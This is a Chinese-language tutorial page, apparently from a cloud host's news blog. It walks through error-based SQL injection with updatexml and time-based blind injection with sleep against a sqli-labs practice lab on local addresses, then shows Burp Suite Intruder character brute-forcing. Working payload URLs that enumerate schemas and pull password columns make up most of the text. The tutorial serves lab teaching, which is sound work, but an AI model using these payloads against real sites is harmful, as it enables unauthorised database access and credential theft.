溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的

發(fā)布時(shí)間:2021-12-10 09:40:31 來源:億速云 閱讀:175 作者:柒染 欄目:大數(shù)據(jù)

今天就跟大家聊聊有關(guān) sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

環(huán)境:sqli的第一關(guān)用的szx.php

一、報(bào)錯(cuò)注入

1、獲取數(shù)據(jù)庫名稱,通過修改limit 后面的值獲取不同的數(shù)據(jù)庫名稱

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +

2、獲取數(shù)據(jù)庫中的表,指定數(shù)據(jù)庫名稱,通過修改limit 后面的值獲取不同的表名

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 2,1),1) -- +

3、獲取表字段,指定表名并轉(zhuǎn)為十六進(jìn)制形式,通過修改limit 后面的值獲取不同的表字段

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、獲取字段內(nèi)容,指定數(shù)據(jù)庫字段和表名稱,通過修改limit 后面的值獲取不同的字段內(nèi)容

http://192.168.1.129/sqli/Less-1/?id=1'  and updatexml(1,(select concat(0x7e, pass,0x7e) from jay.user limit 1,1),1) -- +

二、盲注

1、獲取數(shù)據(jù)庫長(zhǎng)度,如果數(shù)據(jù)長(zhǎng)度大于等于2等待5秒,如果小于2不做任何操作,修改該數(shù)值判斷數(shù)據(jù)庫長(zhǎng)度

http://192.168.1.129/php/szx.php?id=1 and (select (if(length(database())>2,sleep(5),null)))#

2、獲取數(shù)據(jù)庫名稱

如果數(shù)據(jù)名稱左邊第一個(gè)是'j',多停留1面,如果不是多停留5秒,修改該字符判斷數(shù)據(jù)庫名稱

http://192.168.1.129/php/szx.php?id=1 and If(left(database(),1)='j',1,sleep(5))

如果數(shù)據(jù)名稱左邊第一個(gè)是106,ascii碼是'j',多停留1面,如果不是多停留5秒,修改該字符判斷數(shù)據(jù)庫名稱

http://192.168.1.129/php/szx.php?id=1 and If(ascii(substr(database(),1,1))=106,sleep(1),sleep(5))

三、Burpsuit探測(cè)(盲注)

1、抓包發(fā)送到Intruder模塊,并設(shè)置好變量

sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的

2、設(shè)置payload,ASCII中a-z是97-122,設(shè)置步長(zhǎng)為1

sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的

3、start attack,只有106的時(shí)間是2000,其他時(shí)間都是5000多,說明第一個(gè)位數(shù)字的ASCII碼是106,依次類推獲取其他位置的信息

sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的

看完上述內(nèi)容,你們對(duì) sql注入漏洞報(bào)錯(cuò)注入和盲注是怎么樣的有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

sql
AI